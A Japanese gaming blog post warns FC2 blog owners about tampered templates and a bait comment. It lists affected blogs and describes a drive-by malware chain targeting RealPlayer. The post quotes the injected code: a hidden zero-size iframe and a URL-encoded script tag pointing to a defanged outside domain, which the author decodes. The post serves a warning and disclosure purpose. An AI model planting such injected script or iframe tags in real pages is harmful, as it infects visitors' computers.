■□■□■□■□■ FC2ブログテンプレート改竄に関して □■□■□■□■□テンプレート改竄の件に関しては以下のエントリーを参照下さい。
・
ウイルス検出について【報告】・
ウイルス検出について【情報追記】・
ウイルス検出について【罠再び!】また
3/14〜3/15に第七猫の名を語り、踊り子AF関係の
罠コメが
各ブログ様で見られているようです。以下のコメントは罠ですので見つけ次第
削除を宜しくお願い致します(´;ω;`)ブワッ
>踊り子AFクエのアイテムですが、新エリアの過去オズで詩人ヤグ4匹くらいで
>2個ドロップ(トレハン+4あり・忍シ暗白白)しました。
>運がよかっただけかもですが参考までに書いておきます。↑この内容で
第七猫の名での書き込みです。
アドレスには
絶対にアクセスなさらないようにお願い申し上げます。
■□■□■□■□■□■□■□■□■□■□■□■□■□■□■□■□■□■こんにちわ、
第七猫です!(´・ω・`)
不本意ながらまたこのエントリーでの記事が…まだ発覚してあまり時間が経っていませんが
新たな手口での罠が見られたので、皆さん至急
ご一読と心当たりのある方は
PCの
ウイルススキャン実施をお勧め致します。
■どこに罠が…−−−−−−−−−−−− 概要 −−−−−−−−−−−−−−
?
ペコろぐ 様(Javaスクリプト発見、要注意→現在
修正し公開)
?
ヴァナモンBlog 様(Javaスクリプト発見、要注意→現在
修正し公開)
?
FF11ある黒魔導士の軌跡 様(インラインフレーム発見、要注意→現在
修正し公開)
?
FF11初心者の館 様(Javaスクリプト発見、
要注意)
?
Lostfr【誰か】かまって【くれませんか?】 様
(Javaスクリプト発見、要注意→現在
修正し公開)
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
?今回第七猫も確認できたのは
サルベージ関係で有名な
FC2ブログ様。
→ペコろぐさん(ttp://pekoe1001.blog100.fc2.com/)
現在(3/22昼過ぎ)、
非公開モードになっておりますがいつから罠が張られていたかは
現時点で
不明です。特に週末ですので、見に行かれた方は
ウイルススキャンを掛けた方が
宜しいかと思われます。
カスペルスキーでの検出報告がありますので、こちらでスキャンされるのが良いかと。
↓
・
カスペルスキーオンラインスキャン〜3/22 23:00頃追記〜なんと…ここにも
同様の罠が…(´・ω・`)
グーグル先生に問い合わせただけなのに…
?ヴァナモンBlog 様(ttp://vanamon.blog53.fc2.com/)
ちょっ…おまっ…((( ;゚Д゚)))ガクガクブルブル
何その赤信号…
たまたまグー先生から行こうとしたけど、
直接飛べる人も多いんじゃ…
大変失礼ながら、ヴァナモンさんの
htmlソースをDLし早速
チェックしてみた結果…
あったよ…なんだこれは…同じような
エンコードされたアドレスに
Javaスクリプト…
Σ(゚Д゚;≡;゚д゚)?
グー先生からだと、ちゃんと
警告出ますが
直接飛べる人は注意してください!
〜3/23 2:30頃〜こちらは
インラインフレームの罠…もうね…いい加減に…(#^ω^)
?
FF11 ある黒魔導士の軌跡 様(ttp://volnutblog65。fc2。com/)
以前からの
インラインフレーム+今回のHellhへの誘導というコンボが炸裂…
大変失礼ながら
ソースを拝見、そしてチェック…
テンプレの一番ラストに、
エンコードされたアドレスへのインラインフレーム発見…
これは…
アウアウ!
しかもヤラシイ事に、
Dr.WEBでチェックを掛けたんですが…
エンコードしてあるせいか、Hellhは検出する物の
緑表示(クリーン)が…(´;ω;`)
こうなってしまっては直接飛び先のソースをDLして、直接自分でチェックするしか…(泣
〜3/23 15:00頃〜
?こちらも
追加です…
FF11 初心者の館 様(ttp://ff11afian.blog113.fc2.com/)
毎度の事ながら、こちらも失礼して
ソースを拝見…
もうね…
危険を察知したらウイルス
感染以上のスピードで、情報を
開示していくしか今とのコトロ取る
手段が無い!!ヽ(TДT)ノ
ちっくしょー!(´;ω;`)ブワッ
?
Lostfr【誰か】かまって【くれませんか?】 様
当ブログにコメント頂きました
ロストさん管理のブログです。
3/20に見慣れぬ
Javaスクリプトからエンコードされた状態へのアドレスに飛ぶ罠が…
既に
修正済みでソースは確認できておりませんが、被害が広がる一方ですね(´・ω・`)
■どんな罠?前回ご報告した
インラインフレームタグ↓
<iframe src=http://##### width=0 height=0>< /iframe>
こちらへの
対策が取られ出しているので、テンプレ検索に掛からないように
<script src="http://#####></script>という
Javaスクリプトを利用したアドレスへの誘導が見られた模様です!
このJavaスクリプトから
別のアドレスへ飛び、さらにその先で0×0のインラインフレーム等を
使い色々飛び回るようになっているみたいです。
最終的に
マルウェア 「Exploit.JS.RealPlr.db」を検出する模様(by:カスペルスキー)
名前から察すると前回同様、
RealPlayerの脆弱性を突くウイルスに見られそうですが…
ちなみに罠の内容をもう少し書きますと…
<script src="hxxp//%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73">
</script>今回追加(?)された怪しいスクリプトは上記。
この
「%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73」って
訳の分からないアドレスが指定されていますが、これを
デコードすると…(デコードは
こちら)
→
www■hellh■net/w■jsまた
”hellh■net”か!!Σ(゚д゚)
これは戦士スキーさんのところに仕掛けられた
2個目の罠と同じ物!!
もうね…(´・ω・`)
■FC2管理人の皆様へ至急、ご自分の
ブログのテンプレを確認するようにお願いいたします。
? <iframe
? <script(いずれも”<”は小文字で)
上記二つでの検索をお願いします!!?は前回までと同様の
インラインフレーム。
?は
Javaスクリプトを仕込んだ
今回の罠です!
しかしJavaスクリプトは、
アクセス解析やTBP等の別アプリにも使用しております。
身に覚えの無い物を
選定する必要があります(・∀・)b
ちなみに
当ブログのソースを開き、”<script src”で
検索を掛けてみますと…
このように、
アクセス解析の部分にJavaスクリプトを使用しております。
あとは
プロフィールの部分と、
ブログ内検索の小窓の部分でしょうか。
3箇所いずれも
異常は無い事を確認しております。
このJavaはというと、このようにアクセスカウンター上にポインターを置くと…
このように、
今日のアクセス状況ならびに数日前までのアクセス状況が見られるという機能。
Java機能を止めている状態ではポインターを置いても
反応は無いです。
他には色々設定できる
ブログパーツでJavaスクリプトが使われている場合がありますが
それは各ブログ主様でご確認頂くしかないかなぁ…(´・ω・`)
どうしても
身に覚えが無いアドレスだったり、
怪しくデコードされた物だった場合は
中身を
ソースチェッカー等でご確認されるのが良いかと思われます。
ただソースチェッカーだと、スクリプトの指定先を
完全にチェックできない恐れがあります。
特に今回の様に
エンコードされた意味不明なアドレス等…
手動でデコードし、その先を直接チェックしなければ正確にわからないっぽいです。
■FC2からの回答しつこくFC2に状況説明や今後の対応策をメールしています(汗
何も反応が無いので
「分からないなら、分からないなりに返信をクレ」と要望した所
3/18に一報が入っております。ただ内容は
>お問い合わせいただいた件ですが、現在調査中でございますので
>もうしばらくお待ちいただきますでしょうか。
という物。うーん、まぁ
仕方ないが、いつまでかかるのやら…
一応起きてる現象に対して、アクションが
行われているようには読み取れますが…
まぁいつまでに…という事に関してはやはり
言い出しにくいでしょうね(´・ω・`)
正直、ここまでブログテンプレ改竄が多く見られると管理者云々では無く
システム的なバグや抜け道があるような気がしちゃいますね…恐ろしい…
■取り合えず…取り合えず
現時点で分かっている事を端折って書きました。(3/22 15:30現在)
解析人さん、コメントありがとうございました!丁度同じスレ見ててワロタ(笑
ただ出先だったもので、対応が遅れましたが一旦エントリーを上げておきます。
特に
サルベージ関係というホットな注目のブログ様なので
フレや仲間がいた場合は、
情報を早めに伝えてあげるといいです(・∀・)b
追記:解析人さんのブログ→ ilion.blog47.fc2.com
詳細な
ウイルスの解析情報を頂けた、解析人さんのブログです。
今回の罠の
専門的且つ詳細な検証等が見られます。が以下注意。
>内容の正しさや永続性は保障できません
>(頻繁に編集します)。また、あくまで(仮)なのでそのうち消えるかもしれません。
>ついでに本来は「本当に簡単にハックされるの?」と試しに(デコイとして)
>罠ウェルカムの精神で作ってみただけなので安全性の保障もできかねます。との事です(・∀・)
PR